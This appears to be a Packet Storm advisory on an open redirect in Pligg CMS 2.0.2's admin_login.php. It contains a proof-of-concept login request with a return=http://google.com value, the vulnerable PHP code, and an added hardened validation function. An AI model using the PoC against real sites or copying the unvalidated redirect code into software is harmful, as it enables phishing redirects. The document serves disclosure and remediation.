Pligg CMS 2.0.2 Open Redirect

2015-08-18T00:00:00
ID PACKETSTORM:133146
Type packetstorm
Reporter Arash Khazaei
Modified 2015-08-18T00:00:00

Description

                                        
                                            `# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability  
# Google Dork: N/A  
# Date: 2015/8/18  
# Exploit Author: Arash Khazaei  
# Vendor Homepage: pligg.com  
# Software Link: https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip  
# Version: 2.0.2 (Last Version)  
# Tested on: Kali, Iceweasel Browser  
# CVE : N/A  
# Contact : http://twitter.com/0xClay  
# Site : http://bhunter.ir  
  
Introduction :  
  
Pligg CMS is a CMS written in PHP and licensed under GPL v2.0.  
An open redirect vulnerability exists in the admin_login.php file, in the return= input.  
  
# POC :  
  
POST /pligg-cms-master/admin/admin_login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com  
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 75  
  
username=admin&password=admin&processlogin=1&return=http://google.com  
  
=====================  
  
Vulnerable Code :  
  
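// $return carries the return= request value (see POC) and reaches both output branches unchanged  
if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(), "cgi") >= 0){  
    // IIS/CGI branch: value is written into a script block and an href  
    echo '<SCRIPT LANGUAGE="JavaScript">window.location="' . $return . '";</script>';  
    echo $main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href = "'.$return.'">' . $main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>';  
} else {  
    // Default branch: value is written into the Location header  
    header('Location: '.$return);  
}  
die;  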
  
  
  
Discovered By : Arash Khazaei  
`
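
A hardened form of the redirect handling quoted under "Vulnerable Code", as an added example that is not part of the advisory and not Pligg's own code. The function name `safe_return_target` and the fallback path `/admin/` are assumptions chosen for illustration; the sample inputs are constructed, apart from the value taken from the POC.

```php
<?php
// Added example, not Pligg's code. safe_return_target() and the default
// path '/admin/' are hypothetical names chosen for illustration.

/**
 * Return $return only if it is a same-site, path-only target;
 * otherwise fall back to $default.
 */
function safe_return_target($return, string $default = '/admin/'): string
{
    if (!is_string($return) || $return === '') {
        return $default;
    }
    // Reject control characters (CR/LF would split the Location header)
    // and backslashes, which some browsers treat as forward slashes.
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $return)) {
        return $default;
    }
    // Must start with exactly one "/": this blocks "http://host",
    // protocol-relative "//host" and schemes such as "javascript:".
    if ($return[0] !== '/' || (isset($return[1]) && $return[1] === '/')) {
        return $default;
    }
    // parse_url() must agree that no scheme or host component is present.
    $parts = parse_url($return);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $return;
}

// Constructed sample inputs; the first is the return= value from the POC.
$samples = [
    'http://google.com', '//google.com', '/\\google.com',
    "/admin/\r\nSet-Cookie: x=1", 'javascript:alert(1)',
    '/admin/admin_index.php?tab=1',
];
foreach ($samples as $s) {
    printf("%-36s => %s\n", json_encode($s), safe_return_target($s));
}

// The two output branches of the quoted code would then use the result
// with context-appropriate encoding:
//   header('Location: ' . $target);                                    // header
//   echo '<script>window.location=' . json_encode($target, JSON_HEX_TAG) . ';</script>';
//   echo '<a href="' . htmlspecialchars($target, ENT_QUOTES, 'UTF-8') . '">';
```

Only the last sample is returned unchanged; every other input, including the POC value, resolves to the fallback path.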